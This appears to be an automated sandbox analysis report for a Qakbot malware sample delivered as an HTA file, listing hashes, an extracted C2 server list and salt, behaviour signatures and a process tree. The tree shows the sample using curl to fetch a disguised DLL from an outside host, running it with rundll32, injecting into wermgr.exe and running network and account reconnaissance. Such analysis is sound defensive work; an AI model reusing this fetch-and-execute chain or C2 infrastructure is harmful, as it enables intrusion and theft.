Resubmissions
02/02/2023, 21:19
230202-z6jahaba9y 1002/02/2023, 21:19
230202-z6b67aba9w 702/02/2023, 21:17
230202-z48sdafh78 702/02/2023, 20:21
230202-y5afjaae3w 1002/02/2023, 20:20
230202-y4k6msfd36 702/02/2023, 20:03
230202-ysnsdsac8z 702/02/2023, 20:02
230202-yr9ngaac8w 702/02/2023, 20:01
230202-yrllmsfb54 702/02/2023, 19:47
230202-yhszcsab9z 702/02/2023, 19:46
230202-yg5lrsfa45 7Analysis
-
max time kernel
1800s -
max time network
1799s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02/02/2023, 21:19
Static task
static1
General
-
Target
Open.hta
-
Size
3KB
-
MD5
7daa66c5c04a63b630e284360740bc3f
-
SHA1
13ccbcef1329ae8c204c13e757a867e31f3b62bc
-
SHA256
35e319a9cd3e423081fa1d0a0c084f555b1c5fb1042189dd969d1706f6d25fe2
-
SHA512
c23873af1524f9d97e4f4066a64240a6339c9ebe30ed1a623c60db683b0e85189dab28976f9116a7c9a38a864b9acdc8de66fda96ea7e3e58b46217efe965744
Malware Config
Extracted
qakbot
404.432
BB12
1675352134
213.67.255.57:2222
86.96.72.139:2222
119.82.122.226:443
86.96.34.182:2222
12.172.173.82:50001
107.146.12.26:2222
97.116.78.96:443
47.61.70.188:2078
197.148.17.17:2078
82.127.204.82:2222
82.121.195.187:2222
73.155.10.79:443
91.231.173.199:995
86.196.12.21:2222
90.78.51.182:2222
90.165.109.4:2222
202.186.177.88:443
92.27.86.48:2222
88.171.156.150:50000
78.130.215.67:443
70.66.199.12:443
47.203.227.114:443
162.248.14.107:443
75.98.154.19:443
83.248.199.56:443
64.237.207.9:443
82.36.36.76:443
183.82.112.209:443
98.145.23.67:443
70.77.116.233:443
49.245.127.223:2222
105.99.105.0:443
209.142.97.83:995
74.33.196.114:443
75.156.125.215:995
189.222.55.8:443
70.160.80.210:443
194.166.90.227:443
12.172.173.82:20
12.172.173.82:995
91.68.227.219:443
91.170.115.68:32100
70.51.133.160:2222
90.104.22.28:2222
86.161.143.7:2222
173.76.49.61:443
24.64.112.40:2222
92.154.45.81:2222
84.219.213.130:6881
47.21.51.138:995
86.130.9.182:2222
78.16.206.181:443
217.128.91.196:2222
74.214.61.68:443
92.239.81.124:443
72.188.121.121:443
181.118.206.65:995
200.109.207.186:2222
12.172.173.82:465
86.165.225.227:2222
208.180.17.32:2222
24.64.112.40:50010
184.153.132.82:443
151.65.168.222:443
72.80.7.6:995
79.9.64.37:995
174.104.184.149:443
24.64.112.40:3389
81.151.102.224:443
108.2.111.66:995
47.34.30.133:443
50.68.204.71:993
123.3.240.16:995
103.12.133.134:2222
47.196.203.73:443
73.165.119.20:443
86.172.79.135:443
41.250.182.207:443
217.128.200.114:2222
47.6.243.7:443
156.217.208.137:995
12.172.173.82:32101
73.36.196.11:443
173.18.126.3:443
81.229.117.95:2222
190.191.35.122:443
84.35.26.14:995
37.14.229.220:2222
90.162.45.154:2222
24.71.120.191:443
86.225.214.138:2222
172.90.139.138:2222
92.207.132.174:2222
217.165.235.126:443
104.35.24.154:443
69.159.158.183:2222
24.123.211.131:443
67.61.71.201:443
86.194.156.14:2222
197.14.77.92:443
184.189.41.80:443
103.169.83.89:443
86.151.21.134:2222
23.251.92.57:2222
71.31.101.183:443
99.254.167.145:443
198.2.51.242:993
76.80.180.154:995
92.11.194.53:995
88.126.94.4:50000
121.121.100.207:995
92.154.17.149:2222
74.92.243.113:50000
68.150.18.161:443
69.119.123.159:2222
50.68.204.71:995
93.238.63.3:995
201.244.108.183:995
92.8.190.175:2222
-
salt
SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 3 IoCs
pid Process 3692 rundll32.exe 3692 rundll32.exe 3692 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 664 net.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 1288 ipconfig.exe 4600 netstat.exe -
Kills process with taskkill 1 IoCs
pid Process 3412 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3692 rundll32.exe 3692 rundll32.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe 3964 wermgr.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3692 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 3412 taskkill.exe Token: SeDebugPrivilege 4600 netstat.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeDebugPrivilege 2340 whoami.exe Token: SeSecurityPrivilege 3756 msiexec.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 1556 wrote to memory of 1376 1556 mshta.exe 83 PID 1556 wrote to memory of 1376 1556 mshta.exe 83 PID 1556 wrote to memory of 1376 1556 mshta.exe 83 PID 1556 wrote to memory of 3692 1556 mshta.exe 85 PID 1556 wrote to memory of 3692 1556 mshta.exe 85 PID 1556 wrote to memory of 3692 1556 mshta.exe 85 PID 1556 wrote to memory of 3412 1556 mshta.exe 86 PID 1556 wrote to memory of 3412 1556 mshta.exe 86 PID 1556 wrote to memory of 3412 1556 mshta.exe 86 PID 3692 wrote to memory of 1128 3692 rundll32.exe 88 PID 3692 wrote to memory of 1128 3692 rundll32.exe 88 PID 3692 wrote to memory of 1128 3692 rundll32.exe 88 PID 3692 wrote to memory of 3964 3692 rundll32.exe 89 PID 3692 wrote to memory of 3964 3692 rundll32.exe 89 PID 3692 wrote to memory of 3964 3692 rundll32.exe 89 PID 3692 wrote to memory of 3964 3692 rundll32.exe 89 PID 3692 wrote to memory of 3964 3692 rundll32.exe 89 PID 3964 wrote to memory of 664 3964 wermgr.exe 100 PID 3964 wrote to memory of 664 3964 wermgr.exe 100 PID 3964 wrote to memory of 664 3964 wermgr.exe 100 PID 3964 wrote to memory of 1256 3964 wermgr.exe 102 PID 3964 wrote to memory of 1256 3964 wermgr.exe 102 PID 3964 wrote to memory of 1256 3964 wermgr.exe 102 PID 3964 wrote to memory of 1248 3964 wermgr.exe 104 PID 3964 wrote to memory of 1248 3964 wermgr.exe 104 PID 3964 wrote to memory of 1248 3964 wermgr.exe 104 PID 3964 wrote to memory of 1288 3964 wermgr.exe 106 PID 3964 wrote to memory of 1288 3964 wermgr.exe 106 PID 3964 wrote to memory of 1288 3964 wermgr.exe 106 PID 3964 wrote to memory of 3752 3964 wermgr.exe 108 PID 3964 wrote to memory of 3752 3964 wermgr.exe 108 PID 3964 wrote to memory of 3752 3964 wermgr.exe 108 PID 3964 wrote to memory of 3540 3964 wermgr.exe 110 PID 3964 wrote to memory of 3540 3964 wermgr.exe 110 PID 3964 wrote to memory of 3540 3964 wermgr.exe 110 PID 3540 wrote to memory of 436 3540 net.exe 112 PID 3540 wrote to memory of 436 3540 net.exe 112 PID 3540 wrote to memory of 436 3540 net.exe 112 PID 3964 wrote to memory of 2720 3964 wermgr.exe 113 PID 3964 wrote to memory of 2720 3964 wermgr.exe 113 PID 3964 wrote to memory of 2720 3964 wermgr.exe 113 PID 3964 wrote to memory of 4600 3964 wermgr.exe 115 PID 3964 wrote to memory of 4600 3964 wermgr.exe 115 PID 3964 wrote to memory of 4600 3964 wermgr.exe 115 PID 3964 wrote to memory of 3464 3964 wermgr.exe 117 PID 3964 wrote to memory of 3464 3964 wermgr.exe 117 PID 3964 wrote to memory of 3464 3964 wermgr.exe 117 PID 3464 wrote to memory of 3996 3464 net.exe 119 PID 3464 wrote to memory of 3996 3464 net.exe 119 PID 3464 wrote to memory of 3996 3464 net.exe 119 PID 3964 wrote to memory of 2340 3964 wermgr.exe 120 PID 3964 wrote to memory of 2340 3964 wermgr.exe 120 PID 3964 wrote to memory of 2340 3964 wermgr.exe 120
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\curl.exe"C:\Windows\System32\curl.exe" --output C:\ProgramData\1.png --url https://spincotech.com/8CoBExd/3.gif2⤵PID:1376
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\1.png,Wind2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\wermgr.exeC:\Windows\SysWOW64\wermgr.exe3⤵PID:1128
-
-
C:\Windows\SysWOW64\wermgr.exeC:\Windows\SysWOW64\wermgr.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\net.exenet view4⤵
- Discovers systems in the same network
PID:664
-
-
C:\Windows\SysWOW64\cmd.execmd /c set4⤵PID:1256
-
-
C:\Windows\SysWOW64\arp.exearp -a4⤵PID:1248
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:1288
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.WORKGROUP4⤵PID:3752
-
-
C:\Windows\SysWOW64\net.exenet share4⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share5⤵PID:436
-
-
-
C:\Windows\SysWOW64\route.exeroute print4⤵PID:2720
-
-
C:\Windows\SysWOW64\netstat.exenetstat -nao4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Windows\SysWOW64\net.exenet localgroup4⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:3996
-
-
-
C:\Windows\SysWOW64\whoami.exewhoami /all4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im mshta.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
526KB
MD5f0f24ffaff98315065fcdcdce15e97b0
SHA1314170e250a6352cfb62f3e63ff6cde8f585c5cf
SHA2560f671171cf7f421ff58c023b2ab55e85b2bbb38934d5189bd911668ea2d79512
SHA512183673716a5d6e4d36204f0f35a6c00ceb3da9735a24765cd92b51d0af0aafddb752f33c1f99833ece27d404e4b994c162eacf02666bea2329ea504512228e5c
-
Filesize
526KB
MD5f0f24ffaff98315065fcdcdce15e97b0
SHA1314170e250a6352cfb62f3e63ff6cde8f585c5cf
SHA2560f671171cf7f421ff58c023b2ab55e85b2bbb38934d5189bd911668ea2d79512
SHA512183673716a5d6e4d36204f0f35a6c00ceb3da9735a24765cd92b51d0af0aafddb752f33c1f99833ece27d404e4b994c162eacf02666bea2329ea504512228e5c
-
Filesize
2.1MB
MD5f530495445432d6ae00f2b0f08f7c804
SHA1f66f538b95b1a924c8392fbe7743d193d78eb50c
SHA2565cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b
SHA5122b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8
-
Filesize
2.1MB
MD5f530495445432d6ae00f2b0f08f7c804
SHA1f66f538b95b1a924c8392fbe7743d193d78eb50c
SHA2565cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b
SHA5122b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8